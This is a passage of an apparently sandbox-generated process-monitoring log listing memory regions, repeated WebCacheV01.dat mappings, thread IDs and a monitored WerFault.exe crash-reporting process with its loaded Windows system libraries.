"\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3712 start_va = 0x4110000 end_va = 0x411ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3713 start_va = 0x4120000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3714 start_va = 0x4130000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3715 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3716 start_va = 0x4150000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3717 start_va = 0x4160000 end_va = 0x416ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3718 start_va = 0x4170000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3719 start_va = 0x4180000 end_va = 0x418ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3720 start_va = 0x4190000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3721 start_va = 0x41b0000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3722 start_va = 0x41c0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3723 start_va = 0x41d0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3724 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3725 start_va = 0x41f0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3726 start_va = 0x4200000 end_va = 0x420ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3727 start_va = 0x4210000 end_va = 0x421ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3728 start_va = 0x4220000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3729 start_va = 0x4230000 end_va = 0x423ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3730 start_va = 0x4240000 end_va = 0x424ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3731 start_va = 0x4260000 end_va = 0x426ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3732 start_va = 0x4270000 end_va = 0x427ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3733 start_va = 0x4280000 end_va = 0x428ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3734 start_va = 0x4290000 end_va = 0x429ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3735 start_va = 0x42a0000 end_va = 0x42affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3736 start_va = 0x42b0000 end_va = 0x42bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3737 start_va = 0x42c0000 end_va = 0x42cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3738 start_va = 0x42d0000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3739 start_va = 0x42e0000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3740 start_va = 0x4250000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3741 start_va = 0x4330000 end_va = 0x433ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3742 start_va = 0x42f0000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3743 start_va = 0x4300000 end_va = 0x430ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3746 start_va = 0x4310000 end_va = 0x431ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004310000" filename = "" Region: id = 3747 start_va = 0x4340000 end_va = 0x434ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3748 start_va = 0x4350000 end_va = 0x435ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3749 start_va = 0x4360000 end_va = 0x436ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Thread: id = 17 os_tid = 0xf80 Thread: id = 18 os_tid = 0x724 Thread: id = 19 os_tid = 0xd64 Thread: id = 20 os_tid = 0xadc Thread: id = 21 os_tid = 0x8a0 Thread: id = 22 os_tid = 0x898 Thread: id = 23 os_tid = 0x888 Process: id = "7" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x380ce000" os_pid = "0x560" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1468 -s 796" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 960 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 961 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 962 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 963 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 964 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 965 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 966 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 967 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 968 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 969 start_va = 0x8f0000 end_va = 0x932fff monitored = 0 entry_point = 0x910f50 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 970 start_va = 0x940000 end_va = 0x493ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 971 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 972 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 973 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 974 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 975 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 976 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 977 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 978 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 979 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 980 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 981 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 982 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 983 start_va = 0x400000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 984 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 985 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 986 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 987 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 988 start_va = 0x520000 end_va = 0x5ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 989 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 990 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 991 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 992 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 993 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 994 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 995 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 996 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 997 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 998 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 999 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1000 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1001 start_va = 0x6c990000 end_va = 0x6cacefff monitored = 0 entry_point = 0x6c9bd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1002 start_va = 0x72700000 end_va = 0x72721fff monitored = 0 entry_point = 0x727091f0 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1003 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1004 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1005 start_va = 0x6c930000 end_va = 0x6c983fff monitored = 0 entry_point = 0x6c9610d0 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 1006 start_va = 0x70000000 end_va = 0x70020fff monitored = 0 entry_point = 0x7001a910 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 1007 start_va = 0x6cad0000 end_va = 0x6cb56fff monitored = 0 entry_point = 0x6cb3dbc0 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 1008 start_va = 0x1b0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1009 start_va = 0x5e0000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1010 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1011 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1012 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1013 start_va = 0x1b0000 end_va = 0x1d9fff monitored = 0 entry_point = 0x1b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1014 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1015 start_va = 0x4940000 end_va = 0x4ac7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004940000" filename = "" Region: id = 1016 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1017 start_va = 0x4ad0000 end_va = 0x4c50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ad0000" filename = "" Region: id = 1018 start_va = 0x4c60000 end_va = 0x605ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 1019 start_va = 0x190000 end_va = 0x191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1020 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1021 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1022 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1023 start_va = 0x5e0000 end_va = 0x62efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1024 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1025 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1026 start_va = 0x630000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1027 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1028 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1029 start_va = 0x420000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1030 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1031 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1032 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1033 start_va = 0x6060000 end_va = 0x685ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006060000" filename = "" Region: id = 1034 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1035 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1036 start_va = 0x410000 end_va = 0x41afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1037 start_va = 0x410000 end_va = 0x41afff monitored = 1 